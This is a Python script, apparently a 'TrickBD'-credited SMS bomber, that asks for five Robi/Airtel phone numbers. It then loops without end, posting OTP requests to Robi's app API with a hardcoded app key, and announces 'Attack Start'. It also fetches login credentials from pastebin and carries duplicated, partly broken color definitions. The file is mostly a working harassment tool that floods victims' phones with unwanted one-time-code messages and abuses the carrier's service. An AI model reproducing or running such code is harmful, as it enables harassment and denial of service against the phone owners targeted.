# Reset
color_off="\033[0m"       # Text Reset

# Regular Colors
black="\033[0;30m"        # Black
red="\033[0;31m"          # Red
green="\033[0;32m"        # Green
yellow="\033[0;33m"       # Yellow
blue="\033[0;34m"         # Blue
purple="\033[0;35m"       # Purple
cyan="\033[0;36m"         # Cyan
white="\033[0;37m"        # White

# Bold
bblack="\033[1;30m"       # Black
bred="\033[1;31m"         # Red
bgreen="\033[1;32m"       # Green
byellow="\033[1;33m"      # Yellow
bblue="\033[1;34m"        # Blue
bpurple="\033[1;35m"      # Purple
bcyan="\033[1;36m"        # Cyan
bwhite="\033[1;37m"       # White

# Underline
ublack="\033[4;30m"       # Black
ured="\033[4;31m"         # Red
ugreen="\033[4;32m"       # Green
uyellow="\033[4;33m"      # Yellow
ublue="\033[4;34m"        # Blue                                                                upurple="\033[4;35m"      # Purple
ucyan="\033[4;36m"        # Cyan
uwhite="\033[4;37m"       # White

# Background
on_black="\033[40m"       # Black
on_red="\033[41m"         # Red
on_green="\033[42m"       # Green
on_yellow="\033[43m"      # Yellow                                                              on_blue="\033[44m"        # Blue                                                                on_purple="\033[45m"      # Purple
on_cyan="\033[46m"        # Cyan
on_white="\033[47m"       # White

# High Intensty
iblack="\033[0;90m"       # Black
ired="\033[0;91m"         # Red
igreen="\033[0;92m"       # Green
iyellow="\033[0;93m"      # Yellow
iblue="\033[0;94m"        # Blue
ipurple="\033[0;95m"      # Purple
icyan="\033[0;96m"        # Cyan
iwhite="\033[0;97m"       # White

# Bold High Intensty
biblack="\033[1;90m"      # Black
bired="\033[1;91m"        # Red
bigreen="\033[1;92m"      # Green
biyellow="\033[1;93m"     # Yellow
biblue="\033[1;94m"       # Blue
bipurple="\033[1;95m"     # Purple
bicyan="\033[1;96m"       # Cyan
biehite="\033[1;97m"      # White

# High Intensty backgrounds
on_iblack="\033[0;100m"   # Black
on_ired="\033[0;101m"     # Red
on_igreen="\033[0;102m"   # Green
on_iyellow="\033[0;103m"  # Yellow
on_iblue="\033[0;104m"    # Blue
on_ipurple="\033[10;95m"  # Purple
on_icyan="\033[0;106m"    # Cyan
on_iwhite="\033[0;107m"   # White


# From TrickBD By ROC-X

# Bold High Intensty
biblack="\3[1;90m"      # Black
bired="\3[1;91m"        # Red
bigreen="\3[1;92m"      # Green
biyellow="\3[1;93m"     # Yellow
biblue="\3[1;94m"       # Blue
bipurple="\3[1;95m"     # Purple
bicyan="\3[1;96m"       # Cyan
# Bold High Intensty
# Bold High Intensty
biblack="\033[1;90m"      # Black
bired="\033[1;91m"        # Red
bigreen="\033[1;92m"      # Green
biyellow="\033[1;93m"     # Yellow
biblue="\033[1;94m"       # Blue
bipurple="\033[1;95m"     # Purple
bicyan="\033[1;96m"       # Cyan
# Bold High Intensty
import requests
import sys
import os
os.system('clear')

print(biblack+"""
███╗░░██╗░█████╗░██╗░░░██╗░█████╗░███╗░░██╗
████╗░██║██╔══██╗╚██╗░██╔╝██╔══██╗████╗░██║
██╔██╗██║██║░░██║░╚████╔╝░██║░░██║██╔██╗██║
██║╚████║██║░░██║░░╚██╔╝░░██║░░██║██║╚████║
██║░╚███║╚█████╔╝░░░██║░░░╚█████╔╝██║░╚███║
╚═╝░░╚══╝░╚════╝░░░░╚═╝░░░░╚════╝░╚═╝░░╚══╝
""")


usereq=requests.get("https://pastebin.com/raw/drPXWDDX")
passreq=requests.get("https://pastebin.com/raw/6t39cAWt")
usern=usereq.text
passw=passreq.text

print("\033[32m")
inpuser=str(input("   ✔ Enter Your Username : "))
inppass=str(input("   ✔ Enter Your Password : "))

if usern==inpuser and passw==inppass:
	print (" [√] User & Password Correct")
	pass
else:
	print (" [×] Wrong User & Password")
	sys.exit()
	
os.system('clear')




# Bold High Intensty
biblack="\033[1;90m"      # Black
bired="\033[1;91m"        # Red
bigreen="\033[1;92m"      # Green
biyellow="\033[1;93m"     # Yellow
biblue="\033[1;94m"       # Blue
bipurple="\033[1;95m"     # Purple
bicyan="\033[1;96m"       # Cyan
# Bold High Intensty


# Bold High Intensty
biblack="\033[1;90m"      # Black
bired="\033[1;91m"        # Red
bigreen="\033[1;92m"      # Green
biyellow="\033[1;93m"     # Yellow
biblue="\033[1;94m"       # Blue
bipurple="\033[1;95m"     # Purple
bicyan="\033[1;96m"       # Cyan
biehite="\033[1;97m"      # White
import requests, time
import requests, time

# Bold High Intensty
biblack="\033[1;90m"      # Black
bired="\033[1;91m"        # Red
bigreen="\033[1;92m"      # Green
biyellow="\033[1;93m"     # Yellow
biblue="\033[1;94m"       # Blue
bipurple="\033[1;95m"     # Purple
bicyan="\033[1;96m"       # Cyan
biehite="\033[1;97m"      # White

print(biblue+"""
███╗░░██╗░█████╗░██╗░░░██╗░█████╗░███╗░░██╗
████╗░██║██╔══██╗╚██╗░██╔╝██╔══██╗████╗░██║
██╔██╗██║██║░░██║░╚████╔╝░██║░░██║██╔██╗██║
██║╚████║██║░░██║░░╚██╔╝░░██║░░██║██║╚████║
██║░╚███║╚█████╔╝░░░██║░░░╚█████╔╝██║░╚███║
╚═╝░░╚══╝░╚════╝░░░░╚═╝░░░░╚════╝░╚═╝░░╚══╝
""")

import requests
from requests.structures import CaseInsensitiveDict


import requests
from requests.structures import CaseInsensitiveDict
import time

print("\033[36m")
a=str(input("     01  [>] Enter The RoBi/Airtel Number: "))
b=str(input("     02  [>] Enter The RoBi/Airtel Number: "))
c=str(input("     03  [>] Enter The RoBi/Airtel Number: "))
d=str(input("     04  [>] Enter The RoBi/Airtel Number: "))
e=str(input("     05  [>] Enter The RoBi/Airtel Number: "))
url2 = "https://circle.robi.com.bd/mylife/appapi/appcall.php"


headers2 = CaseInsensitiveDict()
headers2["x-app-key"] = "000oc0so48owkw4s0wwo4c00g00804w80gwkw8kg"
headers2["User-Agent"] = "gzip"
headers2["Content-Type"] = "application/x-www-form-urlencoded"




data2 = "op=getOTC&pin=21799&app_version=78&msisdn="+a
url3 = "https://circle.robi.com.bd/mylife/appapi/appcall.php"


headers3 = CaseInsensitiveDict()
headers3["x-app-key"] = "000oc0so48owkw4s0wwo4c00g00804w80gwkw8kg"
headers3["User-Agent"] = "gzip"
headers3["Content-Type"] = "application/x-www-form-urlencoded"




data3 = "op=getOTC&pin=21799&app_version=78&msisdn="+b
url4 = "https://circle.robi.com.bd/mylife/appapi/appcall.php"


headers4 = CaseInsensitiveDict()
headers4["x-app-key"] = "000oc0so48owkw4s0wwo4c00g00804w80gwkw8kg"
headers4["User-Agent"] = "gzip"
headers4["Content-Type"] = "application/x-www-form-urlencoded"




data4 = "op=getOTC&pin=21799&app_version=78&msisdn="+c
url5 = "https://circle.robi.com.bd/mylife/appapi/appcall.php"


headers5 = CaseInsensitiveDict()
headers5["x-app-key"] = "000oc0so48owkw4s0wwo4c00g00804w80gwkw8kg"
headers5["User-Agent"] = "gzip"
headers5["Content-Type"] = "application/x-www-form-urlencoded"




data5 = "op=getOTC&pin=21799&app_version=78&msisdn="+d
url6 = "https://circle.robi.com.bd/mylife/appapi/appcall.php"


headers6 = CaseInsensitiveDict()
headers6["x-app-key"] = "000oc0so48owkw4s0wwo4c00g00804w80gwkw8kg"
headers6["User-Agent"] = "gzip"
headers6["Content-Type"] = "application/x-www-form-urlencoded"




data6 = "op=getOTC&pin=21799&app_version=78&msisdn="+e

i=100
import os
os.system('clear')

print(bicyan+"""
███╗░░██╗░█████╗░██╗░░░██╗░█████╗░███╗░░██╗
████╗░██║██╔══██╗╚██╗░██╔╝██╔══██╗████╗░██║
██╔██╗██║██║░░██║░╚████╔╝░██║░░██║██╔██╗██║
██║╚████║██║░░██║░░╚██╔╝░░██║░░██║██║╚████║
██║░╚███║╚█████╔╝░░░██║░░░╚█████╔╝██║░╚███║
╚═╝░░╚══╝░╚════╝░░░░╚═╝░░░░╚════╝░╚═╝░░╚══╝

""")

import requests
from requests.structures import CaseInsensitiveDict

print(bigreen+"========================================="+on_ired+"\n\t {×} Attack Start......"+color_off+bigreen+"\n=========================================")


while i>1:
    x = requests.post(url2, headers=headers2, data=data2)
    time.sleep(2)
    
    
    x1 = requests.post(url3, headers=headers3, data=data3)
    time.sleep(2)
    
    x2 = requests.post(url4, headers=headers4, data=data4)
    time.sleep(2)
    
    x3 = requests.post(url5, headers=headers5, data=data5)
    time.sleep(2)
    x4 = requests.post(url6, headers=headers6, data=data6)
    time.sleep(2)
    print(bired+x.text+bicyan+' number[\' '+on_iblue+a+color_off+bigreen+' \']')
    print(bired+x1.text+bicyan+' number[\' '+on_iblue+b+color_off+bicyan+' \']')
    print(bired+x2.text+bicyan+' number[\' '+on_iblue+c+color_off+bicyan+' \']')
    print(bired+x3.text+bicyan+' number[\' '+on_iblue+d+color_off+bicyan+' \']')
    
    print(bired+x4.text+bicyan+' number[\' '+on_iblue+e+color_off+bicyan+' \   ✪ Ryans™  ')
os.system('clear')
